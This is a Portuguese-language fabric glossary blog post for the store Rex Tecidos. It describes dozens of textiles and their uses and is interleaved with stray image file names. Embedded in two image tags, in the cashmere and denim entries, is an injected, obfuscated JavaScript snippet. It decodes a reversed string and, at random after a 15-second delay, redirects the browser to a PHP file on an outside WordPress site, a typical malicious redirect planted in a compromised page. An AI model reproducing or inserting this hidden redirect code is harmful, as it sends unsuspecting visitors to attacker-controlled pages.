PARTE I – VOCÊ QUER CONHECER OS TECIDOS E SUAS APLICAÇÕES?

Por: Maritza Villarroel
Exclusivamente para Rex Tecidos
Tecidos Finos Do Mundo Todo

PARTE I

VOCÊ QUER CONHECER OS TECIDOS E SUAS APLICAÇÕES?

A REX TECIDOS te oferece uma volta ao mundo dos tecidos e das suas mais variadas aplicações. Desta forma, você pode escolher o tecido que quer e você poderá usa-lo de acordo com a sua necessidade. Em nossa loja, temos muitos tipos de tecidos, todos de alta qualidade e prestígio.

Entendem-se por tecido o resultado da combinação de fios através de técnicas, e que forma-se uma estrutura flexível. Também podem ser formados a partir de fibras. Os fios e fibras usados na fabricação de tecidos podem ser naturais ou artificiais. Eles têm diferentes níveis de flexibilidade e de resistência, de modo que cada tecido é feito de material diferente de acordo com a utilização que lhe vai dar.

Os tecidos naturais são fabricados a partir de fios e fibras obtidas do algodão, seda, lã, linho, entre outras. Não necessitam de um processo químico para a transformação. Tecidos artificiais, normalmente obtidos a partir de certos polímeros tornam-se fios . Os tecidos artificiais mais comuns são aqueles que partem do prinípio do poliéster ou do nylon. Este tipo de tecido geralmente requer processos químicos para se transformar num material flexível e fornecem a estrutura necessária.

Independentemente de qualquer coisa, natural ou artificial, os tecidos são geralmente classificados de acordo com a sua utilização final , entre elas estão:

Tecidos Comuns: tecidos para vestuária em geral a serem empregados na fabricação de roupas, calçados e interiores ou exteriores em geral.

Tecido geotêxtil: são tecidos utilizados em processos agrícolas.

Tecidos de Interiores: Estes tecidos são utilizados principalmente na decoração e estofados, bem como na fabricação de tapetes.

Tecidos industriais: são tecidos reais com aplicações industriais, e ao contrário dos outros, são projetados e construídos com materiais mais fortes e devem atender aos requisitos de aplicações industriais e não são comercializados na mesma escala que os tecidos comuns.

OS DIFERENTES TIPOS DE TECIDOS E SUAS UTILIDADES

Acetinado: Um tecido de fios de seda, com misturas artificiais feitas de acetato de celulosa. Não encolhe, não se desfiam e não enrugam. Ele pode ser usado para a roupa de dentro, blusas, vestidos, etc.

Acetato

Acrílico: tecido artificial semelhante a tecido da lã. Geralmente em cores vivas. Substitui tecido de lã natural em qualquer aplicação.

tela_aida_verde_4aac43e71ba26

Tela Aida: Este é um tecido de algodão especialmente fabricado para ponto cruz. É o mais fácil de trabalhar e bordar. Ele é vendido em escalas variádas de 8, 11, 16 e 18. São numerados. O número de pontos é em polegada.

Alemanisco: Usado para confeccionar roupas de tecido forte ou de algodão. Apresenta uma superfície irregular, devido aos fios alternados que atravessam a armação. Ele é usado para toalhas e lençóis.

composicion-telas-glosario_1_1268023

Alencon: Lace (renda), que tem o nome da cidade francesa onde nasceu esse tecido. É caracterizado por uma fibra que sempre segue um desenho. Usado para vestidos delicados como de lingerie, ou de casamento.

Alencon

Algodão: Fibra de Algodão que depende de uma estrutura fina, pura, brilhosa e de fibras longas. As fibras são obtidas a partir das sementes da árvore de algodão. Sua maior qualidade é uma fibra mais fina. Os tecidos de fibra longa podem ser usados para cambraia, popeline, damasco etc. Esta fibra tem um grande poder absorvente. É resistente ao calor, lavável, não desfia e não acumulam eletricidade estática.

de-algodon-tela-de-sastre-prendas-de-vestir_3312659

Tecido Batiste ou Cambraia: um tecido é branco, muito fino e muito grosso ao mesmo tempo, que tem um leve tecer dos fios de linho que dão um brilho especial. Usada para vestidos de batismo, blusas e cachecóis.

Batista

Damasco: Um tecido brilhante. Apresenta chuviscos devido à sua disposição irregular (conjunto de fios no tear colocado longitudinalmente e paralelamente, para formar um tecido). É ideal para toalhas de mesa e cortinas.

adamascado-280-mt-ancho

Alpaca: tecido feito com fibras de lã de alpaca. Tecido fino, sedoso e leve. Ele é usado em casacos, blusas, etc.

alfombra-moderna-de-tela-pintada-a-mano-4458-2033599

Angora: A base de lã de cabra, macias, brilhantes e de fios rígidos. Ele pode ser usada para blusas, jaquetas, tecidos crus, material de decoração e combinação com vestidos, chapéus, etc  e tapeçarias.

B3BEB603D

Ásia: Um tecido de puro linho com fios regulares e muito grossos. Muito usado para o bordado ponto cruz. É ideal para colchas, toalhas de mesa travesseiros etc

4485942-detalle-de-una-tela--lino-puro

Bayadère: Tecido com listras e muito contraste no sentido transversal. É geralmente usado para toalhas de mesa e guardanapos.

tissu-carre-Biarritz-olive

Brocado: tecido de seda com bordados de fios de metal em relevo ou mais brilhante de seda com desenhos de flores, animais, ou formas. Há brocados que mistura, em diferentes proporções o rayon com a viscose. E o algodão, da a sua textura e espessura. Usado para vestidos e roupas elegantes.

12301766-resumen-de-fondo-de-una-pesada-tela-de-brocado-azul-profundo-con-diseno-entretejido-repeticion

 Brocatelle: com urdidura (conjunto de fios que são colocados no tear longitudinal e paralela de modo a formar um tecido) da trama de seda e algodão. Como o linho ou fios de seda pura. Compõe-se de muitas cores. Deve ser sempre lavado a seco. Esse tecido era muito usado para fazer vestidos populares nos séculos XIX e XX, também usado em interiores como em móveis estofados e cortinas.

6.2-brocatel-2

Cachemir ou Caxemira: Um tecido fino, macio e que é feito com lã de cabra cahimir do Tibete.

pink-Paisley-pattern-<script type=$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and-flower-fabric-by-Robert-Kaufman-171765-2" src="http://blog.rexfabrics.com/wp-content/uploads/2012/12/pink-Paisley-pattern-and-flower-fabric-by-Robert-Kaufman-171765-2.jpg" width="450" height="450" />

Chalis: tecido de lã suave, e muito leve. Com esse tecido fazemos blusas e vestidos para senhoras e crianças ou gravatas e quimonos para senhores.

IMG_4144

Chiffon, tule, seda Véu: Tecidos leves e semi-transparente ideal para blusas noite,  e cachecóis.

Cationic-Chiffon-Fabric

Canvas: é um tecido de algodão especial, muito fino e de formação simples. Ele pode servir de suporte para a composição de várias peças, cuja composição não utiliza nenhum tipo de bordado.

am_503464_4631659_940078

Crepe: tecido fino e leve de seda ou algodão, mas também pode ser de outros  tecidos. A aparência é áspera e enrugada. Ele é usado em todos os tipos de roupas, dependendo da espessura, podendo ser vestidos longos, ternos e casacos.

305791638_677

Georgette Crepe: tecido de seda brilhante geralmente com algodão, seda com rayon e outras misturas, em que a aparência e as propriedades do crepe são  muito caracteristicas.

CREPE_GEORGETTE

Crepon: muito semelhante ao tecido de crepe. Foi usado no século XIX para fazer vestidos, blusas, cuecas e pijamas.

Crepon_Chiffon_with_Purl

Pile: Delgado, tecido enrugado, feito de seda, lã, algodão, rayon, linho, e também combinações dos mesmos, em geral, é estampado e é muito utilizado em roupas femininas.

Screen-shot-2012-01-03-at-11.20.40-PM

Chintz: O nome francês "cretone" foi o primeiro fabricante deste tecido. É um tecido de algodão estampado ligeiramente grosso. Usado para vestidos simples para senhoras, cortinas e outras peças de interior de casas.

CRETONA

Cuti: Um tecido de algodão listrado, que é utilizado para cobrir colchões. Ele é muito forte e de fibras duráveis.

CutiJacquard

D'Alençon: Uma renda grossa, frisada com um fios finos chamados Cordone. Usado para itens delicados, como o vestido de casamento.

Alencon12060R-white-1

Damasco: Tecido de algodão, seda ou lã, que combina fios ricos, formando um padrão de relevo. Há também versões de tecidos damasco feitos com fios de seda e metálicos. Os corsets e saias, se encaixam bem com este tipo de tecido.

5116813-estilo-de-vectores-con-un-fondo-metalico-damasco-patron-inspirado-en-las-telas-indias-los-azulejos-s

Denim, jeans ou cowboy: Tecido denso e forte a base de sarja e algodão (tecido com linhas diagonais) e é usado para calças, jaquetas, camisas, sapatos.

3077613117_db319d736e

Douppioni: Tecido de superfície irregular. Ele imita o rayon e outros materiais sintéticos, é utilizado para o vestuário tais como vestidos, saias e roupa formal.

20100215215341

Drill: tecido de algodão forte, semelhante ao denim. Com linhas de reforço, plana mais próxima da gabardina. Muito usado para uniformes, cobertores, roupas esportivas, e aplicações industriais

475108794_243

Pés secos ou piquet: Geralmente usado para roupas esportivas pois é anti-transpirante.

JPIQ-004-BG

Silk dupion: seda natural com textura e brilho. Com misturas de rugas de seda selvagem, porém é aí que reside o seu charme.

Cetim-de-seda

Dubetina: tecido macio e ligeiramente peludo, geralmente de tons sólidos. Ele é usado para fazer sapatos e chinelos, brinquedos e cobertores.

dubetina_gris_claro

Rendas: tecido formado por fios de seda, algodão, linho, ouro ou prata ou tranças de malha ou openwork motivo diferente. Ela é usada em roupas, lingerie, acessórios.

12953304-una-imagen-de-fondo-de-tela-de-encaje-de-color-marfil

Falha: Tecido com textura firme e encorpado e com caimento, com  textura rugorosa misturando seda e rayon.

discontinua

 Feltro: Este tecido é baseado em um tear fios e fibras, com fios indo em todas as direções. Tem muitas aplicações industriais, artesanais e na fabricação de bolsas e acessórios simples.

4512813952_2eb7346aec

Flanela: superfície macia, acetinada que quase anula a textura do tecido. Sem brilho. Pode encolher se não for tratada.

franela_g

Gabardine:  Tecido de fio de algodão texturizado diagonalmente e resistente. É um tecido denso, durável e resistente ao desgaste. Difícil de passar, pode brilhar  com o uso e contato com calor. É usado em roupas para homens e mulheres, casacos, capas impermeáveis, uniformes e camisas masculinas.

41527

Gaze ou musseline: tecido fino e transparente feito de tecido de seda e muito solto, com caimento leve, em que algumas aplicações formam ondulações. Muitas vezes usado para vestidos drapeados, babados e chales, assim como  para saias esvoaçantes.

174785

Gazar: É um tecido muito fino, mas tem um caimento perfeito para uma saia longa com cauda. Podem ser de espessuras diferentes, embora a textura é sempre suave.

9671.lg

Georgette: tecido de seda natural e levemente bordado com desenhos diversos. É um tecido nitido com caimento leve e durável. É usado para fazer blusas, vestidos, etc

China_Chiffon_Georgette_Fabric2011331028362

Rendas guipure, guipure ou Valenciennes: É uma renda grossa, pesada e consistente a base de tule. Pode ser bordada, com fitas e aplicações soltas, ou com contas de cristal.

Copy-of-SHOP-089-448x318

Hipora: Similar ao Goretex, tecido impermeável que permite a pele respirar. Usado para roupas esportivas, capas de chuva e/ou capotes para locais de vento ou frio.

115808-3

Lona: Tecido áspero e resistente a base de fios de algodão misturados com poliéster. Proveniente da cidade litoranêa francêsa de Olonne. Utilizado para calças, sapatos etc

tela-lona

Denim: Em tons de azul, marrom ou cinza escuro, o tecido é de alta durabilidade para uniformes de trabalho. Tecido grosso e bruto. Este tecido é usado para confeccionar calças, chapéus, uniformes, colchas, cortinas e roupas esportivas.

98_cotton_2_elastane_slub_indigo_denim_fabric_11oz_sp<script type=$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andex_denim_fabric" src="http://blog.rexfabrics.com/wp-content/uploads/2012/12/98_cotton_2_elastane_slub_indigo_denim_fabric_11oz_spandex_denim_fabric.jpg" width="420" height="314" />

Mikado ou micado: A seda grossa, com textura levemente granulada.

C0C3F0F1E

 

 

Request a Consultation

A fun, easy, and FREE consultation at our store located in Miami, Florida.

Name *
 
Email address *
 
Phone number *
 
consultation Type *
 
Appointments
Appointments are available Mon-Sat from 10 a.m. to 7 p.m. and Sun from 10 a.m. to 5 p.m.
Date *
time *
Additional details *
* Required Fields